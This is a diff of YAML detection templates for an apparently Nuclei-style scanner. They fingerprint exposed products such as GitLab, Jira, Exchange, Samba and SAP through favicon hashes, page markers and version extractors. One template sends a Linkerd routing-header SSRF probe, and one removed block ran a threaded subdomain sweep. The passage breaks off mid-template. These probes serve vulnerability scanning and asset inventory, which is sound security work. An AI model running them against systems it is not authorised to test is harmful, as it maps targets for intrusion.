a/poc/detect/favicon-detection-7446.yaml b/poc/detect/favicon-detection-7446.yaml index 1a180e71b7..624f917a05 100644 --- a/poc/detect/favicon-detection-7446.yaml +++ b/poc/detect/favicon-detection-7446.yaml @@ -2024,11 +2024,3 @@ requests: name: "One Identity Password Manager" dsl: - "status_code==200 && (\"983384876\" == mmh3(base64_py(body)))" - - type: dsl - name: "Kaseya" - dsl: - - "status_code==200 && (\"-1445519482\" == mmh3(base64_py(body)))" - - type: dsl - name: "OpenSNS" - dsl: - - "status_code==200 && (\"1167011145\" == mmh3(base64_py(body)))" diff --git a/poc/detect/firebase-detect-7493.yaml b/poc/detect/firebase-detect-7493.yaml index fe4d9b42a7..fcf13d1285 100644 --- a/poc/detect/firebase-detect-7493.yaml +++ b/poc/detect/firebase-detect-7493.yaml @@ -1,11 +1,11 @@ id: firebase-detect + info: name: firebase detect author: organiccrap severity: low - reference: - - http://ghostlulz.com/google-exposed-firebase-database/ - tags: tech,firebase + # http://ghostlulz.com/google-exposed-firebase-database/ + requests: - method: GET path: diff --git a/poc/detect/github-enterprise-detect-7649.yaml b/poc/detect/github-enterprise-detect-7649.yaml new file mode 100644 index 0000000000..bb831d7879 --- /dev/null +++ b/poc/detect/github-enterprise-detect-7649.yaml @@ -0,0 +1,19 @@ +id: github-enterprise-detect + +info: + name: Detect Github Enterprise + author: ehsahil + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - "GitHub · Enterprise" diff --git a/poc/detect/gitlab-detect-7670.yaml b/poc/detect/gitlab-detect-7670.yaml index 4db4e862cc..80d05e7f84 100644 --- a/poc/detect/gitlab-detect-7670.yaml +++ b/poc/detect/gitlab-detect-7670.yaml @@ -1,13 +1,18 @@ id: gitlab-detect + info: name: Detect Gitlab author: ehsahil severity: info + metadata: + shodan-query: http.title:"GitLab" tags: panel,gitlab + requests: - method: GET path: - "{{BaseURL}}/users/sign_in" + redirects: true max-redirects: 2 matchers-condition: and @@ -16,6 +21,7 @@ requests: words: - 'GitLab' - 'https://about.gitlab.com' + - type: status status: - 200 diff --git a/poc/detect/gunicorn-detect-7863.yaml b/poc/detect/gunicorn-detect-7863.yaml index 0c162e4c4e..b004233e04 100644 --- a/poc/detect/gunicorn-detect-7863.yaml +++ b/poc/detect/gunicorn-detect-7863.yaml @@ -3,9 +3,10 @@ id: gunicorn-detect info: name: Detect Gunicorn Server author: joanbono - description: Gunicorn Python WSGI HTTP Server for UNIX - reference: https://github.com/benoitc/gunicorn severity: info + description: Gunicorn Python WSGI HTTP Server for UNIX + reference: + - https://github.com/benoitc/gunicorn tags: tech,gunicorn requests: diff --git a/poc/detect/harbor-detect-7886.yaml b/poc/detect/harbor-detect-7886.yaml index d20e4657cf..5745151ea6 100644 --- a/poc/detect/harbor-detect-7886.yaml +++ b/poc/detect/harbor-detect-7886.yaml @@ -1,23 +1,19 @@ id: harbor-detect - info: name: Harbor Detect author: pikpikcu severity: info tags: tech,harbor - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - "Harbor" part: body - - type: status status: - 200 diff --git a/poc/detect/hp-device-info-detect-8010.yaml b/poc/detect/hp-device-info-detect-8010.yaml index 56bc5f52e9..f308cd0a9c 100644 --- a/poc/detect/hp-device-info-detect-8010.yaml +++ b/poc/detect/hp-device-info-detect-8010.yaml @@ -1,35 +1,22 @@ -id: hp-device-info-detect - -info: - name: HP LaserJet - - author: pussycat0x - - severity: low - - reference: https://www.exploit-db.com/ghdb/6905 - - tags: iot,hp - -requests: - - method: GET - - path: - - "{{BaseURL}}/hp/device/DeviceInformation/View" - - matchers-condition: and - - matchers: - - type: word - - words: - - "Device Information" - - - "hp" - - condition: and - - - type: status - - status: - - 200 +id: hp-device-info-detect +info: + name: HP LaserJet + author: pussycat0x + severity: low + reference: https://www.exploit-db.com/ghdb/6905 + tags: iot,hp +requests: + - method: GET + path: + - "{{BaseURL}}/hp/device/DeviceInformation/View" + matchers-condition: and + matchers: + - type: word + words: + - "Device Information" + - "hp" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/detect/iplanet-imap-detect-8188.yaml b/poc/detect/iplanet-imap-detect-8188.yaml index 1aad185ab7..8a8818bee1 100644 --- a/poc/detect/iplanet-imap-detect-8188.yaml +++ b/poc/detect/iplanet-imap-detect-8188.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: info metadata: - fofa-query: 'app="iPlanet-Messaging-Server-5.2" && protocol="imap"' + fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap" tags: network,imap network: - inputs: diff --git a/poc/detect/jaspersoft-detect-8218.yaml b/poc/detect/jaspersoft-detect-8218.yaml index 7cafc9a84d..e38d04792c 100644 --- a/poc/detect/jaspersoft-detect-8218.yaml +++ b/poc/detect/jaspersoft-detect-8218.yaml @@ -1,10 +1,9 @@ id: jaspersoft-detect - info: name: Jaspersoft detected author: koti2 severity: info - + tags: tech,jaspersoft requests: - method: GET path: diff --git a/poc/detect/java-rmi-detect-8228.yaml b/poc/detect/java-rmi-detect-8228.yaml index fd7523ae1a..798a559d01 100644 --- a/poc/detect/java-rmi-detect-8228.yaml +++ b/poc/detect/java-rmi-detect-8228.yaml @@ -5,8 +5,6 @@ info: author: F1tz severity: info tags: network,rmi,java - description: | - A security vulnerability in the Remote Method Invocation component of the Java Runtime Environment allows unauthenticated network attacks which can result in unauthorized operating system takeover including arbitrary code execution. network: - inputs: diff --git a/poc/detect/jeedom-detect-8251.yaml b/poc/detect/jeedom-detect-8251.yaml index 4154e6b7d0..b7c3ef8645 100644 --- a/poc/detect/jeedom-detect-8251.yaml +++ b/poc/detect/jeedom-detect-8251.yaml @@ -1,24 +1,19 @@ id: jeedom-detect - info: name: Jeedom Detect author: pikpikcu severity: info tags: tech,jeedom - requests: - method: GET path: - "{{BaseURL}}/index.php?v=d" - matchers-condition: and matchers: - - type: word part: body words: - "Jeedom" - - type: status status: - 200 diff --git a/poc/detect/jeedom-detect.yaml b/poc/detect/jeedom-detect.yaml index 09ca14fa5f..4154e6b7d0 100644 --- a/poc/detect/jeedom-detect.yaml +++ b/poc/detect/jeedom-detect.yaml @@ -7,19 +7,10 @@ info: tags: tech,jeedom requests: - - payloads: - Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt - attack: sniper - threads: 100 + - method: GET + path: + - "{{BaseURL}}/index.php?v=d" - raw: - - | - GET /index.php?v=d HTTP/1.1 - Host: {{Subdomains}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept-Encoding: gzip, deflate - Accept: */* - matchers-condition: and matchers: diff --git a/poc/detect/jellyfin-detect-8257.yaml b/poc/detect/jellyfin-detect-8257.yaml index 42ad2b8aa3..226bdb95ce 100644 --- a/poc/detect/jellyfin-detect-8257.yaml +++ b/poc/detect/jellyfin-detect-8257.yaml @@ -1,4 +1,5 @@ id: jellyfin-detect + info: name: Jellyfin detected author: dwisiswant0 @@ -7,6 +8,7 @@ info: verified: true shodan-query: http.html:"Jellyfin" tags: tech,jellyfin + requests: - method: GET path: @@ -15,6 +17,7 @@ requests: - "{{BaseURL}}/index.html" - "{{BaseURL}}/web/index.html" - "{{BaseURL}}/web/manifest.json" + stop-at-first-match: true matchers-condition: and matchers: @@ -25,6 +28,7 @@ requests: - "The Free Software Media System" condition: or part: body + - type: status status: - 200 diff --git a/poc/detect/jira-detect-8315.yaml b/poc/detect/jira-detect-8315.yaml index 4f24793ad5..1816dae07e 100644 --- a/poc/detect/jira-detect-8315.yaml +++ b/poc/detect/jira-detect-8315.yaml @@ -1,29 +1,14 @@ id: jira-detect - info: name: Detect Jira Issue Management Software - author: pdteam,philippedelteil + author: bauthard severity: info - tags: panel,jira - requests: - method: GET path: - "{{BaseURL}}/secure/Dashboard.jspa" - "{{BaseURL}}/jira/secure/Dashboard.jspa" - - "{{BaseURL}}/login.jsp" - - stop-at-first-match: true - redirects: true - max-redirects: 2 matchers: - type: word words: - "Project Management Software" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'title="JiraVersion" value="([0-9.]+)' diff --git a/poc/detect/jsf-detection-8398.yaml b/poc/detect/jsf-detection-8398.yaml index 881d9b64be..27c0e84435 100644 --- a/poc/detect/jsf-detection-8398.yaml +++ b/poc/detect/jsf-detection-8398.yaml @@ -1,36 +1,19 @@ id: jsf-detection - info: name: JavaServer Faces Detection - author: brenocss,Moritz Nentwig + author: Moritz Nentwig severity: info description: Searches for JavaServer Faces content on a URL. - tags: jsf,tech,primefaces,richfaces - + tags: jsf,tech requests: - method: GET path: - "{{BaseURL}}" - redirects: true - max-redirects: 3 - matchers-condition: or + max-redirects: 2 matchers: - - type: dsl - name: javafaces - dsl: - - "(contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState'))" - - - type: dsl - name: primefaces - dsl: - - "contains(body, 'primefaces')" - - "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')" - condition: and - - - type: dsl - name: richfaces - dsl: - - "contains(body, 'richfaces')" - - "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')" - condition: and + - type: word + words: + - "javax.faces.resource" + - "javax.faces.ViewState" + condition: or diff --git a/poc/detect/kong-detect-8501.yaml b/poc/detect/kong-detect-8501.yaml index 020de00c4e..c735bf5a9b 100644 --- a/poc/detect/kong-detect-8501.yaml +++ b/poc/detect/kong-detect-8501.yaml @@ -2,10 +2,8 @@ id: kong-detect info: name: Detect Kong author: geeknik - description: The Cloud-Native API Gateway - reference: https://github.com/Kong/kong + description: The Cloud-Native API Gateway - https://github.com/Kong/kong severity: info - tags: tech,kong requests: - method: GET path: diff --git a/poc/detect/leostream-detection.yaml b/poc/detect/leostream-detection.yaml index 4f4ab48efb..e9174a66cb 100644 --- a/poc/detect/leostream-detection.yaml +++ b/poc/detect/leostream-detection.yaml @@ -1,16 +1,22 @@ id: leostream-panel info: - name: Leostream Panel + name: Leostream Panel Detect author: praetorian-thendrickson severity: info - tags: panel,vdi + reference: + - https://leostream.com + metadata: + shodan-query: http.title:"Leostream" + tags: panel,leostream requests: - method: GET path: - - '{{BaseURL}}/' + - '{{BaseURL}}' matchers-condition: and matchers: - type: word words: - - 'Leostream' - - 'https://www.leostream.com/perpetual-software-license-agreement/' + - '<title>Leostream' + - type: status + status: + - 200 diff --git a/poc/detect/linkerd-ssrf-detect-8639.yaml b/poc/detect/linkerd-ssrf-detect-8639.yaml index 16b0eb2d0f..638ccc9d70 100644 --- a/poc/detect/linkerd-ssrf-detect-8639.yaml +++ b/poc/detect/linkerd-ssrf-detect-8639.yaml @@ -17,10 +17,11 @@ info: name: Linkerd SSRF detection author: dudez severity: info + tags: ssrf,linkerd requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" headers: l5d-dtab: /svc/* => /$/inet/example.com/443 matchers-condition: or diff --git a/poc/detect/linkerd-ssrf-detect-8640.yaml b/poc/detect/linkerd-ssrf-detect-8640.yaml index b5b4b06ffd..c20b988a34 100644 --- a/poc/detect/linkerd-ssrf-detect-8640.yaml +++ b/poc/detect/linkerd-ssrf-detect-8640.yaml @@ -3,8 +3,9 @@ info: name: Linkerd SSRF detection author: dudez severity: high + reference: + - https://twitter.com/nirvana_msu/status/1084144955034165248 tags: ssrf,linkerd,oast - reference: https://twitter.com/nirvana_msu/status/1084144955034165248 requests: - method: GET path: diff --git a/poc/detect/magento-detect-8706.yaml b/poc/detect/magento-detect-8706.yaml index ab9bd9e859..de461a9837 100644 --- a/poc/detect/magento-detect-8706.yaml +++ b/poc/detect/magento-detect-8706.yaml @@ -1,4 +1,5 @@ id: magento-detect + info: name: Magento Detect author: TechbrunchFR @@ -6,17 +7,17 @@ info: description: Identify Magento reference: - https://devdocs.magento.com/guides/v2.4/graphql/ - metadata: - verified: true - shodan-query: http.component:"Magento" tags: magento + requests: - method: GET path: - '{{BaseURL}}' - '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}' + # There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when # consumed by a SPA/PWA app, so we need a valid GraphQL query from Magento to check reference[1] + matchers-condition: or matchers: - type: dsl @@ -24,6 +25,7 @@ requests: - 'contains(tolower(all_headers), "x-magento")' - 'status_code == 200' condition: and + - type: dsl dsl: - 'contains(body, "graphql-authorization")' diff --git a/poc/detect/magmi-detect-8715.yaml b/poc/detect/magmi-detect-8715.yaml index b78bd29310..7e14b04b5d 100644 --- a/poc/detect/magmi-detect-8715.yaml +++ b/poc/detect/magmi-detect-8715.yaml @@ -3,6 +3,9 @@ info: name: MAGMI (Magento Mass Importer) Plugin Detect author: dwisiswant0 severity: info + metadata: + verified: true + shodan-query: http.component:"Magento" tags: magento,magmi,plugin requests: - method: GET diff --git a/poc/detect/maian-cart-detect-8719.yaml b/poc/detect/maian-cart-detect-8719.yaml index 6a61745979..53ccd7b681 100644 --- a/poc/detect/maian-cart-detect-8719.yaml +++ b/poc/detect/maian-cart-detect-8719.yaml @@ -1,14 +1,17 @@ id: maian-cart-detect + info: name: Maian Cart Detection author: pdteam severity: info tags: tech,maian + requests: - method: GET path: - "{{BaseURL}}/favicon.ico" + matchers: - type: dsl dsl: - - "status_code==200 && (\"-498581627\" == mmh3(base64_py(body)))" + - "status_code==200 && (\"-498581627\" == mmh3(base64_py(body)))" \ No newline at end of file diff --git a/poc/detect/microsoft-exchange-server-detect-8851.yaml b/poc/detect/microsoft-exchange-server-detect-8851.yaml index 10eacbc4b1..b89745b772 100644 --- a/poc/detect/microsoft-exchange-server-detect-8851.yaml +++ b/poc/detect/microsoft-exchange-server-detect-8851.yaml @@ -1,26 +1,31 @@ id: microsoft-exchange-server-detect + info: name: Microsoft Exchange Server Detect - author: pikpikcu,dhiyaneshDK + author: pikpikcu severity: info reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse - description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, using Outlook Web App path data. - tags: microsoft,exchange,tech + description: | + Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. + requests: - method: GET path: - "{{BaseURL}}/owa/auth/logon.aspx" - matchers-condition: or + + matchers-condition: and matchers: + - type: status + status: + - 200 + - type: regex regex: - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" part: all - - type: word - words: - - 'Exchange Log In' - - 'Microsoft Exchange - Outlook Web Access' + extractors: - type: kval + part: header kval: - - X_Owa_Version + - X-Owa-Version diff --git a/poc/detect/microweber-detect-8862.yaml b/poc/detect/microweber-detect-8862.yaml index 25c567062d..f3eecf3c3a 100644 --- a/poc/detect/microweber-detect-8862.yaml +++ b/poc/detect/microweber-detect-8862.yaml @@ -1,22 +1,27 @@ id: microweber-detect + info: name: Microweber Detect author: princechaddha severity: info - reference: https://github.com/microweber/microweber + reference: + - https://github.com/microweber/microweber metadata: - shodan-query: 'http.favicon.hash:780351152' + shodan-query: http.favicon.hash:780351152 tags: tech,microweber,oss + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - '"generator" content="Microweber" />' + - type: status status: - 200 diff --git a/poc/detect/mongodb-detect-8921.yaml b/poc/detect/mongodb-detect-8921.yaml index a81bd83ef0..9e08d299ab 100644 --- a/poc/detect/mongodb-detect-8921.yaml +++ b/poc/detect/mongodb-detect-8921.yaml @@ -3,8 +3,7 @@ info: name: MongoDB Detection author: pdteam severity: info - reference: - - https://github.com/orleven/Tentacle + reference: https://github.com/orleven/Tentacle tags: network,mongodb network: - inputs: diff --git a/poc/detect/nexus-detect-9093.yaml b/poc/detect/nexus-detect-9093.yaml index 06dbc8bd2f..e8b8d0e84b 100644 --- a/poc/detect/nexus-detect-9093.yaml +++ b/poc/detect/nexus-detect-9093.yaml @@ -1,23 +1,23 @@ -id: nexus-detect - -info: - name: Nexus Repository Manager (NRM) Instance Detection Template - author: righettod - severity: info - description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor - tags: tech,nexus - -requests: - - method: GET - path: - - "{{BaseURL}}/service/rest/swagger.json" - - matchers-condition: and - matchers: - - type: word - words: - - "Nexus Repository Manager" - - - type: status - status: +id: nexus-detect + +info: + name: Nexus Repository Manager (NRM) Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor + tags: tech,nexus + +requests: + - method: GET + path: + - "{{BaseURL}}/service/rest/swagger.json" + + matchers-condition: and + matchers: + - type: word + words: + - "Nexus Repository Manager" + + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/detect/oauth2-detect-9182.yaml b/poc/detect/oauth2-detect-9182.yaml index 53cc1456fe..5cd181e726 100644 --- a/poc/detect/oauth2-detect-9182.yaml +++ b/poc/detect/oauth2-detect-9182.yaml @@ -1,28 +1,28 @@ -id: oauth2-detect - -info: - name: OAuth 2.0 Authorization Server Detection Template - author: righettod - severity: info - description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint - tags: tech,oauth - -requests: - - method: POST - path: - - "{{BaseURL}}/oauth/token" - - body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" - - matchers-condition: and - matchers: - - type: status - status: - - 401 - - 400 - condition: or - - - type: word - part: body - words: +id: oauth2-detect + +info: + name: OAuth 2.0 Authorization Server Detection Template + author: righettod + severity: info + description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint + tags: tech,oauth + +requests: + - method: POST + path: + - "{{BaseURL}}/oauth/token" + + body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" + + matchers-condition: and + matchers: + - type: status + status: + - 401 + - 400 + condition: or + + - type: word + part: body + words: - 'error":"invalid_client"' \ No newline at end of file diff --git a/poc/detect/olivetti-crf-detect-9243.yaml b/poc/detect/olivetti-crf-detect-9243.yaml index 830f040334..b2aca8edae 100644 --- a/poc/detect/olivetti-crf-detect-9243.yaml +++ b/poc/detect/olivetti-crf-detect-9243.yaml @@ -1,25 +1,25 @@ -id: olivetti-crf-detect +id: olivetti-crf-detect -info: - name: Olivetti CRF Detect - author: pussycat0x - severity: info - metadata: - shodan-query: http.title:"Olivetti CRF" - tags: tech,olivetti +info: + name: Olivetti CRF Detect + author: pussycat0x + severity: info + metadata: + shodan-query: http.title:"Olivetti CRF" + tags: tech,olivetti -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "Olivetti CRF" - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Olivetti CRF" + part: body + + - type: status + status: + - 200 diff --git a/poc/detect/opencast-detect-9265.yaml b/poc/detect/opencast-detect-9265.yaml index 45949c20f8..9ba1934566 100644 --- a/poc/detect/opencast-detect-9265.yaml +++ b/poc/detect/opencast-detect-9265.yaml @@ -1,11 +1,10 @@ id: opencast-panel info: - name: Opencast Admin Panel Discovery + name: Opencast Panel Login author: cyllective,daffainfo severity: info - description: An Opencast Admin panel was discovered. Opencast is a free and open source solution for automated video capture and distribution at scale. - reference: - - https://github.com/opencast/opencast + description: The free and open source solution for automated video capture and distribution at scale. + reference: https://github.com/opencast/opencast tags: panel,opencast requests: - method: GET @@ -20,5 +19,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/21 diff --git a/poc/detect/pega-detect-9473.yaml b/poc/detect/pega-detect-9473.yaml index edd3f4f9a4..058589a15f 100644 --- a/poc/detect/pega-detect-9473.yaml +++ b/poc/detect/pega-detect-9473.yaml @@ -8,17 +8,16 @@ requests: - method: GET path: - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word + part: body words: - '"description" :"The Pega API' - type: status status: - 200 - type: word + part: header words: - 'application/json' - part: header diff --git a/poc/detect/phpcollab-detect-9501.yaml b/poc/detect/phpcollab-detect-9501.yaml index 6bfc4b094e..68b8cf104c 100644 --- a/poc/detect/phpcollab-detect-9501.yaml +++ b/poc/detect/phpcollab-detect-9501.yaml @@ -1,22 +1,18 @@ id: phpcollab-detect - info: name: PhpCollab detect author: pikpikcu severity: info tags: tech,phpcollab - requests: - method: GET path: - "{{BaseURL}}/general/login.php" - matchers: - type: word part: body words: - 'PhpCollab' - extractors: - type: regex part: body diff --git a/poc/detect/plone-cms-detect-9608.yaml b/poc/detect/plone-cms-detect-9608.yaml index 08791ef3f5..706dc2bc2b 100644 --- a/poc/detect/plone-cms-detect-9608.yaml +++ b/poc/detect/plone-cms-detect-9608.yaml @@ -5,9 +5,9 @@ info: author: cyllective severity: info description: Detects Plone CMS - tags: tech,plone,cms reference: - https://github.com/plone/Products.CMFPlone + tags: tech,plone,cms requests: - method: GET diff --git a/poc/detect/prometheus-exporter-detect-9674.yaml b/poc/detect/prometheus-exporter-detect-9674.yaml index 62746091f9..c581c3448c 100644 --- a/poc/detect/prometheus-exporter-detect-9674.yaml +++ b/poc/detect/prometheus-exporter-detect-9674.yaml @@ -4,9 +4,8 @@ info: author: jarijaas severity: info description: Prometheus exporter detector - -# See https://github.com/prometheus/prometheus/wiki/Default-port-allocations - + tags: panel + reference: https://github.com/prometheus/prometheus/wiki/Default-port-allocations requests: - method: GET path: @@ -26,4 +25,4 @@ requests: name: exporter_name group: 1 regex: - - "(.*?)" \ No newline at end of file + - "(.*?)" diff --git a/poc/detect/prtg-detect-9703.yaml b/poc/detect/prtg-detect-9703.yaml index eb2761529e..267af77381 100644 --- a/poc/detect/prtg-detect-9703.yaml +++ b/poc/detect/prtg-detect-9703.yaml @@ -2,8 +2,8 @@ id: prtg-detect info: name: Detect PRTG author: geeknik - description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg severity: info + description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg tags: tech,prtg requests: - method: GET diff --git a/poc/detect/puppetdb-detect-9718.yaml b/poc/detect/puppetdb-detect-9718.yaml index 6373cddfa6..24d5503e44 100644 --- a/poc/detect/puppetdb-detect-9718.yaml +++ b/poc/detect/puppetdb-detect-9718.yaml @@ -1,33 +1,28 @@ id: puppetdb-detect - info: name: PuppetDB Detection author: c-sh0 severity: info - reference: https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version + reference: + - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version tags: puppet,tech,exposure - requests: - method: GET path: - "{{BaseURL}}/pdb/meta/v1/version" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: header words: - 'application/json' - - type: word part: body words: - '"version"' - extractors: - type: regex group: 1 diff --git a/poc/detect/ranger-detection-9829.yaml b/poc/detect/ranger-detection-9829.yaml index 9ee92b5956..d299f2c75d 100644 --- a/poc/detect/ranger-detection-9829.yaml +++ b/poc/detect/ranger-detection-9829.yaml @@ -1,25 +1,29 @@ -id: ranger-detection -info: - name: Apache Ranger Detection - author: For3stCo1d - severity: info - tags: tech,apache,ranger - metadata: - shodan-query: http.title:"Ranger - Sign In" - reference: https://github.com/apache/ranger -requests: - - method: GET - path: - - '{{BaseURL}}/login.jsp' - - "{{BaseURL}}/images/favicon.ico" - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - " Ranger - Sign In" - - type: dsl - name: favicon - dsl: - - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))" +id: ranger-detection + +info: + name: Apache Ranger Detection + author: For3stCo1d + severity: info + tags: tech,apache,ranger + metadata: + shodan-query: http.title:"Ranger - Sign In" + reference: https://github.com/apache/ranger + +requests: + - method: GET + path: + - '{{BaseURL}}/login.jsp' + - "{{BaseURL}}/images/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - " Ranger - Sign In" + + - type: dsl + name: favicon + dsl: + - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))" diff --git a/poc/detect/redash-detection.yaml b/poc/detect/redash-detection.yaml index 091cf745a6..bf2ed28cdc 100644 --- a/poc/detect/redash-detection.yaml +++ b/poc/detect/redash-detection.yaml @@ -1,15 +1,23 @@ id: redash-panel info: - name: Redash Panel - author: Adam Crosser + name: Redash Panel Detect + author: princechaddha severity: info - tags: panel + metadata: + shodan-query: http.favicon.hash:698624197 + tags: panel,redash requests: - method: GET path: - - '{{BaseURL}}/' - redirects: true + - "{{BaseURL}}/login" + matchers-condition: and matchers: - type: word + part: body words: - - 'Login to Redash' + - "Login to Redash" + - "Login | Redash" + condition: or + - type: status + status: + - 200 diff --git a/poc/detect/rhymix-cms-detect-9879.yaml b/poc/detect/rhymix-cms-detect-9879.yaml index 2e2299fb4f..6314a0e45f 100644 --- a/poc/detect/rhymix-cms-detect-9879.yaml +++ b/poc/detect/rhymix-cms-detect-9879.yaml @@ -1,26 +1,22 @@ id: rhymix-cms-detect - info: name: Rhymix CMS Detect author: gy741 severity: info description: Detects Rhymix CMS + reference: + - https://github.com/rhymix/rhymix tags: tech,rhymix - reference: https://github.com/rhymix/rhymix - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: or matchers: - - type: word part: header words: - 'rx_sesskey1' - - type: word part: body words: diff --git a/poc/detect/s3-detect-9965.yaml b/poc/detect/s3-detect-9965.yaml index 3ed37bb68e..7868591be0 100644 --- a/poc/detect/s3-detect-9965.yaml +++ b/poc/detect/s3-detect-9965.yaml @@ -1,11 +1,8 @@ id: s3-detect - info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info - tags: aws,s3,bucket,tech - requests: - method: GET path: diff --git a/poc/detect/samba-detect-9990.yaml b/poc/detect/samba-detect-9990.yaml index 68f0879828..5f5d007c7e 100644 --- a/poc/detect/samba-detect-9990.yaml +++ b/poc/detect/samba-detect-9990.yaml @@ -1,18 +1,18 @@ id: samba-detection + info: name: Samba Detection - description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. - remediation: Always apply the latest security patch. author: pussycat0x severity: info - tags: network,smb,samba + description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. reference: - https://www.samba.org/samba/what_is_samba.html - https://www.samba.org/samba/history/security.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + remediation: Always apply the latest security patch. + tags: network,smb,samba + network: - inputs: - data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200 diff --git a/poc/detect/sap-igs-detect-10039.yaml b/poc/detect/sap-igs-detect-10039.yaml index 023ec23436..9813f9533e 100644 --- a/poc/detect/sap-igs-detect-10039.yaml +++ b/poc/detect/sap-igs-detect-10039.yaml @@ -1,14 +1,17 @@ id: sap-igs-detect + info: name: SAP Internet Graphics Server (IGS) Detection author: _generic_human_ severity: info description: Detection of SAP Internet Graphics Server (IGS) tags: sap,tech,igs + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 2 matchers-condition: and @@ -19,13 +22,16 @@ requests: - "SAP IGS" - "is running" condition: and + - type: status status: - 200 + - type: word part: header words: - "SAP Internet Graphics Server" + extractors: - type: kval part: header diff --git a/poc/detect/sap-netweaver-detect-10047.yaml b/poc/detect/sap-netweaver-detect-10047.yaml index 9fe826a6f5..edbd2eaef5 100644 --- a/poc/detect/sap-netweaver-detect-10047.yaml +++ b/poc/detect/sap-netweaver-detect-10047.yaml @@ -1,17 +1,14 @@ id: sap-netweaver-detect - info: name: SAP NetWeaver ICM Detection author: randomstr1ng - description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) severity: info + description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) tags: sap,webserver - requests: - method: GET path: - "{{BaseURL}}" - redirects: true max-redirects: 2 matchers: @@ -22,7 +19,6 @@ requests: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or - extractors: - type: kval part: header diff --git a/poc/detect/smartstore-detect-10332.yaml b/poc/detect/smartstore-detect-10332.yaml index d3aa558182..6a4a999069 100644 --- a/poc/detect/smartstore-detect-10332.yaml +++ b/poc/detect/smartstore-detect-10332.yaml @@ -1,25 +1,32 @@ id: smartstore-detect + info: name: SmartStore Detect author: princechaddha severity: info - reference: https://github.com/smartstore/SmartStoreNET + reference: + - https://github.com/smartstore/SmartStoreNET metadata: shodan-query: http.html:'content="Smartstore' tags: tech,smartstore,oss + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: regex part: body regex: - '' + - type: status status: - 200 + extractors: - type: regex part: body diff --git a/poc/detect/telerik-dialoghandler-detect-10691.yaml b/poc/detect/telerik-dialoghandler-detect-10691.yaml index 6342e702d6..4a197d50e0 100644 --- a/poc/detect/telerik-dialoghandler-detect-10691.yaml +++ b/poc/detect/telerik-dialoghandler-detect-10691.yaml @@ -2,8 +2,9 @@ id: telerik-dialoghandler-detect info: name: Detect Telerik Web UI Dialog Handler - author: organiccrap,zhenwarx + author: organiccrap,zhenwarx,nielsing severity: info + description: This template detects the Telerik Web UI 